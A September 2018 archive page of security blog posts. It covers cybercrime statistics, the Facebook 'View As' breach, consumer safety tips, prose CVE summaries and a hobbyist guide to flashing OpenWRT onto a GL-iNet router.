Monthly Archives: September 2018

Cyber Safety Begins at Home – Six Top Tips

Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.


Category:

Information Security

Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.

FBI’s Crime Data Explorer: What the Numbers Say about Cybercrime

What do the numbers say about Cybercrime?  Not much.  No one is using them.  

There is a popular quote often mis-attributed to the hero of Total Quality Management, Edward Deming:  "If you can't measure it, you can't manage it."Its one of the first things I think about every year when the FBI releases their annual Crime Statistics Report, as they just did for 2017.   (The "mis-attributed" is because for all the times he has been quoted, Deming actual said almost the exact opposite.  What he actually said, in "The New Economics," was:  "It is wrong to suppose that if you can’t measure it, you can’t manage it – a costly myth.")

Despite being a misquote, I've used it often myself.  There is no way to tell if you are "improving" your response to a crime type if you don't first have valid statistics for it.  Why the quote always pops to mind, however, is because, in the case of cybercrime, we are doing a phenomenal job of ignoring it in official police statistics.  This directly reflects the ability and the practice of our state and local law enforcement agencies to deal with online crime, hacking, and malware cases.  Want to test it yourself?  Call your local Police Department and tell them your computer has a virus.  See what happens.

It isn't for lack of law!  Every State in the Union has their own computer crime law, and most of them have a category that would be broadly considered "hacking."  A quick reference to all 50 states computer crime laws is here:  State Computer Crime Laws - and yet with a mandate to report hacking to the Department of Justice, almost nobody is doing it.

You may be familiar with the Uniform Crime Report, which attempts to create a standard for measurement of crime data across the nation.  UCR failed to help us at all in Cybercrime, because it focused almost exclusively on eight major crimes that were reported through the Summary Reporting System (SRS):

murder and non-negligent homicide, rape, robbery, aggravated assault, burglary, motor vehicle theft, larceny-theft, and arson.

The data for calendar year 2017 was just released this week and is now available in a new portal, called the Crime Data Explorer.  Short-cut URL:  https://fbi.gov/cde



To capture other crime types, the Department of Justice has been encouraging the adoption of the NIBRS - the National Incident-Based Reporting System.  This system primarily focuses on  52 crime categories, and gathers statistics on several more.  Most importantly for us, it includes several categories of "Fraud Crimes"

  • 2 / 26A / False Pretenses/Swindle/Confidence Game
  • 41 / 26B / Credit Card/ATM Fraud
  • 46 / 26C / Impersonation
  • 12 / 26D / Welfare Fraud
  • 17 / 26E / Wire Fraud
  • 63 / 26F / Identity Theft
  • 64 / 26G / Hacking/Computer Invasion

Unfortunately, despite being endorsed by most every major law enforcement advocacy group, many states, including my own, are failing to participate.  The FBI will be retiring SRS in 2021, and as of September 2018, many states are not projected to make that deadline:
https://www.fbi.gov/file-repository/ucr/nibrs-countdown-flyer.pdf
In the just-released 2017 data, out of the 18,855 law enforcement agencies in the United States, 16,207 of them submitted SRS "old-style" UCR data.  Only 7,073 (42%) submitted NIBRS-style data.

Unfortunately, the situation when it comes to cybercrime is even worse.  For SRS-style reporting, all cybercrimes are lumped under "Fraud".  In 2016, SRS reported 10.6 Million arrests.  Only 128,531 of these were for "Fraud" of which cybercrime would be only a tiny portion.

Of those eight "fraud type" crimes, the 2017 data is not yet available for detailed analysis  (currently most of state data sets, released September 26, 2018, limit the data in each table to only 500 rows.  Since, as an example, Hoover, Alabama, the only city in my state participating in NIBRS, has 3800 rows of data, you can see how that filter is inadequate for state-wide analysis in fully participating states!

Looking at the NIBRS 2016 data as a starting point, however, we can still see that we have difficulty at the state and local police level in understanding these crimes.  In 2016, 6,191 law enforcement agencies submitted NIBRS-style data.  Of those 5,074 included at least some "fraud type" crimes.  Here's how they broke down by fraud offense.  Note, these are not the number of CRIMES committed, these are the number of AGENCIES who submitted at least one of these crimes in 2017:

type - # of agencies - fraud type description
==============================================
 2 - 4315 agencies -  False Pretenses/Swindle/Confidence Game
41 - 3956 agencies -  Credit Card/ATM Fraud
46 - 3625 agencies - Impersonation
12 - 328 agencies - Welfare Fraud
17 - 1446 agencies - Wire Fraud
63 - 810 agencies - Identity Theft
64 - 189 agencies - Hacking/Computer Invasion

Only 189 of the nation's 18,855 law enforcement agencies submitted even a single case of "hacking/computer invasion" during 2016!  When I asked the very helpful FBI NIBRS staff about this last year, they confirmed that, yes, malware infections would all be considered "64 - Hacking/Computer Invasion".  To explore on your own, visit the NIBRS 2016 Map.  Then under "Crimes Against Property" choose the Fraud type you would like to explore.  This map shows "Hacking/Computer Intrusion."  Where a number shows up instead of a pin, zoom the map to see details for each agency.

Filtering the NIBRS 2016 map for "Hacking/Computer Intrusion" reports
 As an example, Zooming the number in Tennessee, I can now see a red pin for Nashville.  When I hover that pin, it shows me how many crimes in each NIBRS category were reported for 2017, including 107 cases of Wire Fraud, 34 cases of Identity Theft, and only 3 cases of Hacking/Computer Invasion:

Clicking on "Nashville" as an example

I have requested access to the full data set for 2017.  I'll be sure to report here when we have more to share.






This Day in History: Munich Agreement

Ondřej Matějka, the deputy director of the Institute for the Study of Totalitarian Regimes (ÚSTR) provides a fascinating interview on the 80th anniversary of the infamous Munich Agreement: …the problem wasn’t that the Czechoslovak state couldn’t hold the borders. The problem was more within the society living there, where the pressure from the Sudetendeutsche Partei … Continue reading This Day in History: Munich Agreement

CVE-2018-17797 (zzcms)

An issue was discovered in zzcms 8.3. user/zssave.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

CVE-2018-17795 (libtiff)

The function t2p_write_pdf in tiff2pdf.c in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted TIFF file, a similar issue to CVE-2017-9935.

Long Term Security Attitudes and Practices Study

What makes security practitioners tick? That’s a simple question with a lot of drivers underneath it. We want to find out; please help us by signing up for our study.

The Ask

We’re launching a long term study of security practitioners to understand how they approach security, please sign up for our Long Term Security Attitudes and Practices Study here: https://www.surveymonkey.com/r/CZTZY7M.

Background

A few years ago I was in a customer facing role answering questions about security practices of the SaaS company I worked at. My days were filled with answering questions about our security practices and we would give answers that were good and reasonable answers but not always what the other side was expecting. This discrepancies were based on differing risk tolerances, different contexts, varying approaches to security and technology.

This led to many conversations with our executive about changes to our security practices. Often the question would arise: “what’s good enough?” and outside of pointing to ISO27001/2 and HIPAA I didn’t have an answer. I couldn’t tell my executive what would reasonably satisfy our customer’s security expectations beyond pointing to the standards. Clearly though “standards compliance” wasn’t the minimum bar… it was something different. By outcome we could observe that organizations were willing to accept differing security practices but there was never a consistency of what would be accepted and what had to be argued (or changed) across the hundreds of different customers (even ones in the same industry).

Since then I’ve moved on from that company (and changed to an internal role) but those questions have raised for me a more fundamental set of questions: Do we actually understand how security professionals think? Are we all aiming for perfect compliance with PCI 3.X or are we driven by something else? Do we construct policies that are risk centric? Are we pragmatists or purists? Are we advisers or problem solvers?

These are questions that have stuck with me for a while and I’ve not found academic papers that answer these questions and so we’re starting a community based study. Knowing what makes us tick might help make us a stronger profession; at the very least it will be interesting.

Study Details

The study will consists of multiple surveys; once we get going we’ll start inviting you to a new survey every two weeks. Each survey will be a few questions in length and should not take more than a few minutes of your time. The study will run for as long as there is ongoing interest and sufficient participation. The study doesn’t expect you to participate in every survey although that would be nice; in fact some of the component surveys may not be relevant to you from time to time.

The study will be anonymous; we’ll still collect an email address and track your unique responses but we’ll never share your identity. Tracking you across multiple surveys will allow for correlation – connecting the dots between the many different responses which hopefully will allow us to generate insight.

The anonymized data will be released under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License to allow for reuse by the community. Analysis reports and papers will be released under a Creative Commons License as well and code used to perform the analysis (probably Jupyter Notebooks) will be GPL’ed.

Enrolment

Everyone is welcome – sign up here to participate: https://www.surveymonkey.com/r/CZTZY7M

 

 

The post Long Term Security Attitudes and Practices Study appeared first on Liquidmatrix Security Digest.

#CyberAware: Will You Help Make the Internet a Safe Place for Families?

National Cyber Security Awareness MonthDon’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.

Our Shared Responsibility

This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.

At McAfee, we focus on these matters every day but this month especially, we are linking arms will safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)

8 specific things you can do!

National Cyber Security Awareness Month

  1. Become a NCSAM Champion. The National Cyber Security Alliance (NCSAM) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
  2. Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m., ET/Noon, PT. Learn, connect with other parents and safety pros, and chime in.National Cyber Security Awareness Month
  3. Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT.™ on how each family member can protect their devices and information.
  4. Print it and post it: Print out a STOP. THINK. CONNECT.™ tip sheet and display it in areas where family members spend time online.
  5. Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to make sure you take the time to install a firewall, strengthen your passwords, and make sure your home network as secure as it can be.National Cyber Security Awareness Month
  6. If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
  7. Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
  8. Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.

Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her onTwitter @McAfee_Family. (Disclosures)

The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.

Crucial Elements in Law Enforcement against Cybercrime

Technological innovation, globalization, and urbanization have facilitated criminals and terrorists to pose a fresh wave of hazards that can shake the security establishment of global markets. The development of information and communications technology creates not only advantages, convenience and efficiency, but also disadvantages, challenges and threats. The purpose of this paper is to explore into crucial elements in combating cybercrime. The paper identified the following crucial elements as special perpetrator-victim relationship, time elements, spatial elements, technological nature of cybercrime, complexity, costs, anonymity, hidden victims, concealment, trans-territoriality, and fast increase in recent four decades. They should be emphasized in fighting against cybercrime. The paper further analyzes the phenomenon of rent-seeking from the exaggeration of insecurity and cybercrime, which can be misinformation in this battle.

Reliance on cryptography of cloud computing in Healthcare Information Management, lessons for Ghana Health Service.

Cloud Computing is considered as the next logical step in emerging technology for prosperous resource outsourcing, information sharing in Physician-Patient relationship and a platform for research development. The fast drift of Ghana’s healthcare facilities into cloud computing for finding treatment to humanity’s major illnesses has called for a pragmatic understanding of its security deterrence techniques. Studies in cryptographic discipline of Ghana’s healthcare require a working understanding of the security issues by Healthcare Administrators. Healthcare data leaked outside to unauthorized users tarnishes the image of such individual, healthcare facility and the Ghanaian populace. This paradigm shift requires a strong and efficient security system among healthcare facilities to avoid the erosion of trust. Our review is motivated by these contemporary technologies to explore it adoptions, utilization and provision of security strategies in this innovation. Much emphasis were placed on network, interfaces, data, virtualization, legal, compliance and governance as key areas of security challenges in cloud computing. Relevant literatures were discussed to highlight their prominent findings. The contributions presented are relevant in providing a practical framework for enhancing security in other disciplines as well.

Challenge of Malware Analysis: Malware obfuscation Techniques

It is a big concern to provide the security to computer system against malware. Every day millions of malware are being created and the worse thing is that new malware is highly sophisticated which are very difficult to detect. Because the malware developers use the various obfuscation techniques to hide the actual code or the behaviour of malware. Thereby, it becomes very hard to analyze the malware for getting the useful information in order to design the malware detection system because of anti-static and anti-dynamic analysis technique (obfuscation techniques). In this paper, various obfuscation techniques are discussed in detail.

A Dynamic Scheme for Secure Searches over Distributed Massive Datasets in Cloud Environment using Searchable Symmetric Encryption Technique

Cloud computing has produced a paradigm shift in large-scale data outsourcing and computing. As the cloud server itself cannot be trusted, it is essential to store the data in encrypted form, which however makes it unsuitable to perform searching, computation or analysis on the data. Searchable Symmetric Encryption (SSE) allows the user to perform keyword search over encrypted data without leaking information to the storage provider. Most of the existing SSE schemes have restrictions on the size and the number of index files, to facilitate efficient search. In this paper, we propose a dynamic SSE scheme that can operate on relatively larger, multiple index files, distributed across several nodes, without the need to explicitly merge them. The experiments have been carried out on the encrypted data stored in Amazon EMR cluster. The secure searchable inverted index is created instantly using Hadoop MapReduce framework during the search process, thus significantly eliminate the need to store document-keyword pairs on the server. The scheme allows dynamic update of existing index and document collection. The parallel execution of the pre-processing phase of the present research work enables to reduce processing time at the client. An implementation of our construction has been provided in this paper. Experimental results to validate the efficacy of our scheme is reported.


$1.63 Billion Breach Fine Discussed As Facebook CSO Legacy

At Blackhat this year people sometimes asked me if I was familiar with the “Charlatan Security Officer” situation at Facebook. I was not sure what they meant, and then they showed me threads online and invited me to meetings where this was the topic. Screenshots like the following one about ex-Yahoo CSO and current Facebook … Continue reading $1.63 Billion Breach Fine Discussed As Facebook CSO Legacy

Mini pwning with GL-iNet AR150

Seven years ago, before the $35 Raspberry Pi, hackers used commercial WiFi routers for their projects. They'd replace the stock firmware with Linux. The $22 TP-Link WR703N was extremely popular for these projects, being half the price and half the size of the Raspberry Pi.


Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabyte). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.

I'm interested in that device for the simple reason that it has a big-endian CPU.

All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained with going with that choice.

I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.

The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.

An alternative is the GL-AR150. This is a company who sells commercial WiFi products like the other vendors, but who caters to hackers and hobbyists. Recognizing the popularity of that TP-LINK device, they  essentially made a clone with more stuff, with 16-megabytes of storage and 64-megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included the pins for a console serial port to be directly connected, connectors of additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty.

So this post is about the steps I took to get things working for myself.

The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.

The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1. I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:

# ifconfig eth:1 192.168.8.2 255.255.255.0

The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with  a vanilla installation.

https://wiki.openwrt.org/toh/gl-inet/gl-ar150

I download this using the browser in my Linux VM, then browse to 192.168.8.1, navigate to their firmware update page, and upload this file. It's not complex -- they actually intend their customers to do this sort of thing. Don't worry about voiding the warranty: for a ~$20 device, there is no warranty.

The device boots back up, this time the default address is going to be 192.168.1.1, so again I add another virtual interface to my Linux VM with "ifconfig eth:2 192.168.1.2" in order to communicate with it.

I now need to change this 192.168.1.x setting to match my home network. There are many ways to do this. I could just reconfigure the LAN port to a hard-coded address on my network. Or, I could connect the WAN port, which is already configured to get a DHCP address. Or, I could reconfigure the WiFi component as a "client" instead of "access-point", and it'll similarly get a DHCP address. I decide upon WiFi, mostly because my 24 port switch is already full.

The problem is OpenWRT's default WiFi settings. It's somehow interfering with accessing the device. I can't see how reading the rules, but I'm obviously missing something, so I just go in and nuke the rules. I just click on the "WAN" segment in the firewall management page and click "remove". I don't care about security, I'm not putting this on the open Internet or letting guests access it.

To connect to WiFi, I remove the current settings as an "access-point", then "scan" my local network, select my access-point, enter the WPA2 passphrase, and connect. It seems to work perfectly.

While I'm here, I also go into the system settings and change the name of the device to "MipsDev", and also set the timezone to New York.

I then disconnect the Ethernet and continue at this point via their WiFi connection. At some point, I'm going to just connect power and stick it in the back of a closet somewhere.

DHCP assigns this 10.20.30.46 (I don't mind telling you -- I'm going to renumber my home network soon). So from my desktop computer I do:

C:\> ssh root@10.20.30.46

...because I'm a Windows user and Windows supports ssh now g*dd***it.


OpenWRT had a brief schism a few years ago with the breakaway "LEDE" project. They mended differences and came back together again the latest version. But this older version still goes by the "LEDE" name.

At this point, I need to expand the storage from the 16-megabytes on the device. I put in a 32-gigabyte USB flash drive for $5 -- expanding storage by 2000 times.

The way OpenWRT deals with this is called an "overlay", which uses the same technology has Docker containers to essentially containerize the entire operating system. The existing operating system is mounted read-only. As you make changes, such as installing packages or re-configuring it, anything written to the system, is written into the overlay portion. If you do a factory reset (by holding down the button on boot), it simply discards the overlay portion.

What we are going to do is simply change the overlay from the current 16-meg on-board flash to our USB flash drive. This means copying the existing overlay part to our drive, then re-configuring the system to point to our USB drive instead of their overlay.

This process is described on OpenWRT's web page here:

https://wiki.openwrt.org/doc/howto/extroot

It works well -- but for systems with more than 4-megs. This is what defeated me before, there's not enough space to add the necessary packages. But with 16-megs on this device there is plenty off space.

The first step is to update the package manager, such like on other Linuxs.

# opkg update

When I plug in the USB drive, dmesg tells me it finds a USB "device", but nothing more. This tells me I have all the proper USB drivers installed, but not the flashdrive parts.

[    5.388748] usb 1-1: new high-speed USB device number 2 using ehci-platform

Following the instructions in the above link, I then install those components:

# opkg install block-mount kmod-fs-ext4 kmod-usb-storage-extras

Simply installing these packages will cause it to recognize the USB drive in dmesg:

[   10.748961] scsi 0:0:0:0: Direct-Access     Samsung  Flash Drive FIT  1100 PQ:
0 ANSI: 6
[   10.759375] sd 0:0:0:0: [sda] 62668800 512-byte logical blocks: (32.1 GB/29.9 G
iB)
[   10.766689] sd 0:0:0:0: [sda] Write Protect is off
[   10.770284] sd 0:0:0:0: [sda] Mode Sense: 43 00 00 00
[   10.771175] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn'
t support DPO or FUA
[   10.788139]  sda: sda1
[   10.794189] sd 0:0:0:0: [sda] Attached SCSI removable disk

At this point, I need to format the drive with ext4. The correct way of doing this is to connect to my Linux VM and format it that way. That's because in these storage limited environments, OpenWRT  doesn't have space for such utilities to do this. But with 16-megs that I'm going to overlay soon anyway, I don't care, so I install those utilities.

# opkg install e2fsprogs

Then I do the normal Linux thing to format the drive:

# mkfs.ext4 /dev/sda1

This blows away whatever was already on the drive.

Now we need to copy over the contents of the existing /overlay. We do that with the following:

# mount /dev/sda1 /mnt
# tar -C /overlay -cvf - . | tar -C /mnt -xf - 
# umount /mnt

We use tar to copy because, as a backup program, it maintains file permissions and timestamps. So it's better to backup and restore. We don't want to actually create a file, but instead use it in streaming mode. The '-' on one invocation causes it to stream the results to stdout instead of writing a file. the other invocation uses '-' to stream from stdin. Thus, we never create a complete copy of the archive, either in memory or on the disk. We untar files as soon as we tar them up.

At this point we do a blind innovation I really don't understand. I just did it and it works. The link above has some more text on this, and some things you should check afterwards.

# block detect > /etc/config/fstab; \
   sed -i s/option$'\t'enabled$'\t'\'0\'/option$'\t'enabled$'\t'\'1\'/ /etc/config/fstab; \
   sed -i s#/mnt/sda1#/overlay# /etc/config/fstab; \
   cat /etc/config/fstab;

At  this point, I reboot and relogin. We need to update the package manager again. That's because when we did it the first time, it didn't include packages that could fit in our tiny partition. We update again now with a huge overlay to get a list of all the package.

# opkg update

For example, gcc is something like 50 megabytes, so I wouldn't have fit initially, and now it does. it's the first thing I grab, along with git.

# opkg install gcc make git

Now I add a user. I have to do this manually, because there's no "adduser" utility I can find that does this for me. This involves:

  • adding line to /etc/passwd
  • adding line to /etc/group
  • using passwd command to change the password for the accountt
  • creating a directory for the user
  • chown the user's directory

My default shell is /bin/ash (BusyBox) instead of /bin/bash. I haven't added bash yet, but I figure for a testing system, maybe I shouldn't.

I'm missing a git helper for https, so I use the git protocol instead:

$ git clone git://github.com/robertdavidgraham/masscan
$ cd masscan

At this point, I'd normally run "make -j" to quickly build the project, starting a separate process for each file. This compiles a lot faster, but this device only has 64-mgs of RAM, so it'll run out of space quickly. Each process needs around 20-megabytes of RAM. So I content myself with two threads:

$ make -j 2

That's enough such that one process can be stuck waiting to read files while the other process is CPU bound compiling. This is a slow CPU, so that's a big limitation.

The final linking step fails. That's because this platform uses different libraries than other Linux versions, the musl library instead of glibc you find on the big distros, or uClibc on smaller distros, like those you'd find on the Raspberry Pi. This is excellent -- I found my first bug I need to fix.

In any case, I need to verify this is indeed "big-endian" mode, so I wrote a little program to test it:

#include

void main(void)
{
    int x = *(int*)"\1\2\3\4";
    printf("0x%08x\n", x);
}

It indeed prints the big-endian result:

0x01020304

The numbers would be reversed if this were little-endian like x86.

Anyway, I thought I'd document the steps for those who want to play with these devices. The same steps would apply to other OpenWRT devices. GL-iNet has some other great options to work with, but of course, after some point, it's just easier getting Raspberry Pi knockoffs instead.






CVE-2018-9081 (ez_media_&_backup_center_firmware, ix2_firmware, ix4-300d_firmware, px12-400r_firmware, px12-450r_firmware, px2-300d_firmware, px4-300d_firmware, px4-300r_firmware, px4-400d_firmware, px4-400r_firmware, px6-300d_firmware, storcenter_ix2-dl_firmware, storcenter_ix2_firmware, storcenter_ix4-300d_firmware, storcenter_px12-400r_firmware, storcenter_px12-450r_firmware, storcenter_px2-300d_firmware, storcenter_px4-300d_firmware, storcenter_px4-300r_firmware, storcenter_px6-300d_firmware)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, the file name used for assets accessible through the Content Viewer application are vulnerable to self cross-site scripting self-XSS. As a result, adversaries can add files to shares accessible from the Content Viewer with a cross site scripting payload in its name, and wait for a user to try and rename the file for their payload to trigger.

CVE-2018-9077 (lenovoemc_firmware)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when changing the name of a share, an attacker can craft a command injection payload using backtick "``" characters in the share : name parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.

CVE-2018-9076 (lenovoemc_firmware)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when changing the name of a share, an attacker can craft a command injection payload using backtick "``" characters in the name parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.

CVE-2018-9075 (lenovoemc_firmware)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when joining a PersonalCloud setup, an attacker can craft a command injection payload using backtick "``" characters in the client:password parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.

Insecure code cited in Facebook hack impacting nearly 50 million users

On Sept. 28, Facebook announced via its blog that it discovered attackers exploited a vulnerability in its code that impacted its "View As" feature. While Guy Rosen, VP of product management, notes that the investigation is still in its early stages, the breach is expected to have affected 50 million accounts. It is unclear at this stage whether these accounts were misused or if any personal information has been accessed.

According to Rosen’s post, attackers were able to steal Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature.

Veracode’s Chris Wysopal assumes that the attack was automated in order to collect the access tokens, given that attackers needed to both find this particular vulnerability to get an access token, and then pivot from that account to others in order to steal additional tokens.

In reviewing the available details, Veracode’s Chris Eng suggests that an educated guess could lead to the conclusion that having two-factor authentication enabled on the account may not have protected users. Given that the vulnerability was exploited through the access token as opposed to the standard authentication workflow, it is unlikely second-factor verification would have been triggered.

Facebook reportedly fixed the vulnerability and informed law enforcement of the breach and is temporarily turning off the "View As" feature while they undergo security checks. Additionally, the company has reset the access tokens to the affected accounts and is taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year.

IDG Contributor Network: The home analogy – security redefined for the hybrid world

Let’s roll back the time machine a century. Imagine you were a rich individual and you had a huge home with assets that needed protection. What was your recourse? Hire macho security guards with stern faces to ward off miscreants. Slowly the human guards gave way to padlocks, combination locks etc. And then the advent of the home security system – independent and isolated. And towards the latter part of the century, integrated systems with a wired or wireless backhaul to a central command. That then evolved into more sophisticated perimeter security with cameras, motion detectors etc.

But even in the face of such dramatic changes in home security, one principle has remained steady. It is all about the perimeter. Secure the entrance and exits and you are safe.

To read this article in full, please click here

Facebook Announces Security Flaw Found in “View As” Feature

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.

Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.

While the access tokens of 50 million accounts were taken, Facebook still doesn’t know if any personal information was gathered or misused from the affected accounts. However, they do suspect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.

As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:

  • Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.

CVE-2018-1246 (emc_unity_operating_environment, emc_unityvsa_operating_environment)

Dell EMC Unity and UnityVSA contains reflected cross-site scripting vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim application user to supply malicious HTML or Java Script code to Unisphere, which is then reflected back to the victim and executed by the web browser.

CVE-2018-11073 (authentication_manager)

RSA Authentication Manager versions prior to 8.3 P3 contain a stored cross-site scripting vulnerability in the Operations Console. A malicious Operations Console administrator could exploit this vulnerability to store arbitrary HTML or JavaScript code through the web interface. When other Operations Console administrators open the affected page, the injected scripts could potentially be executed in their browser.

CVE-2018-11074 (authentication_manager)

RSA Authentication Manager versions prior to 8.3 P3 are affected by a DOM-based cross-site scripting vulnerability which exists in its embedded MadCap Flare Help files. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim application user to supply malicious HTML or JavaScript code to the browser DOM, which code is then executed by the web browser in the context of the vulnerable web application.

CVE-2018-11075 (authentication_manager)

RSA Authentication Manager versions prior to 8.3 P3 contain a reflected cross-site scripting vulnerability in a Security Console page. A remote, unauthenticated malicious user, with the knowledge of a target user's anti-CSRF token, could potentially exploit this vulnerability by tricking a victim Security Console user to supply malicious HTML or JavaScript code to the vulnerable web application, which code is then executed by the victim's web browser in the context of the vulnerable web application.

Facebook hack exposed info on up to 50 million users

Facebook announced on Friday that it has suffered a data breach affecting up to 50 million users. According to a report from the New York Times, Facebook discovered the attack on Tuesday and have contacted the FBI. The exploit reportedly enables attackers to take over control of accounts so, as a precaution, the social network has automatically logged out more than 90 million potentially compromised accounts.

Source: Facebook

ATM ‘jackpotter’ sentenced to year in US prison

One of the men involved in an ATM jackpotting scheme in January this year is already facing punishment. A district court in Connecticut has sentenced Argenys Rodriguez to just over a year in prison, plus two years of supervised release and $121,355 in restitution, for collaborating on hacks that slipped malware into bank machines and forced the devices to spit out their cash. Rodriguez had pleaded guilty to bank fraud in June and will start his sentence on November 26th.

Via: Gizmodo, ZDNet

Source: Department of Justice

CVE-2018-6925 (freebsd)

In FreeBSD before 11.2-STABLE(r338986), 11.2-RELEASE-p4, 11.1-RELEASE-p15, 10.4-STABLE(r338985), and 10.4-RELEASE-p13, due to improper maintenance of IPv6 protocol control block flags through various failure paths, an unprivileged authenticated local user may be able to cause a NULL pointer dereference causing the kernel to crash.

CVE-2018-17155 (freebsd)

In FreeBSD before 11.2-STABLE(r338983), 11.2-RELEASE-p4, 11.1-RELEASE-p15, 10.4-STABLE(r338984), and 10.4-RELEASE-p13, due to insufficient initialization of memory copied to userland in the getcontext and swapcontext system calls, small amounts of kernel memory may be disclosed to userland processes. Unprivileged authenticated local users may be able to access small amounts privileged kernel data.

CVE-2018-17154 (freebsd)

In FreeBSD before 11.2-STABLE(r338987), 11.2-RELEASE-p4, and 11.1-RELEASE-p15, due to insufficient memory checking in the freebsd4_getfsstat system call, a NULL pointer dereference can occur. Unprivileged authenticated local users may be able to cause a denial of service.

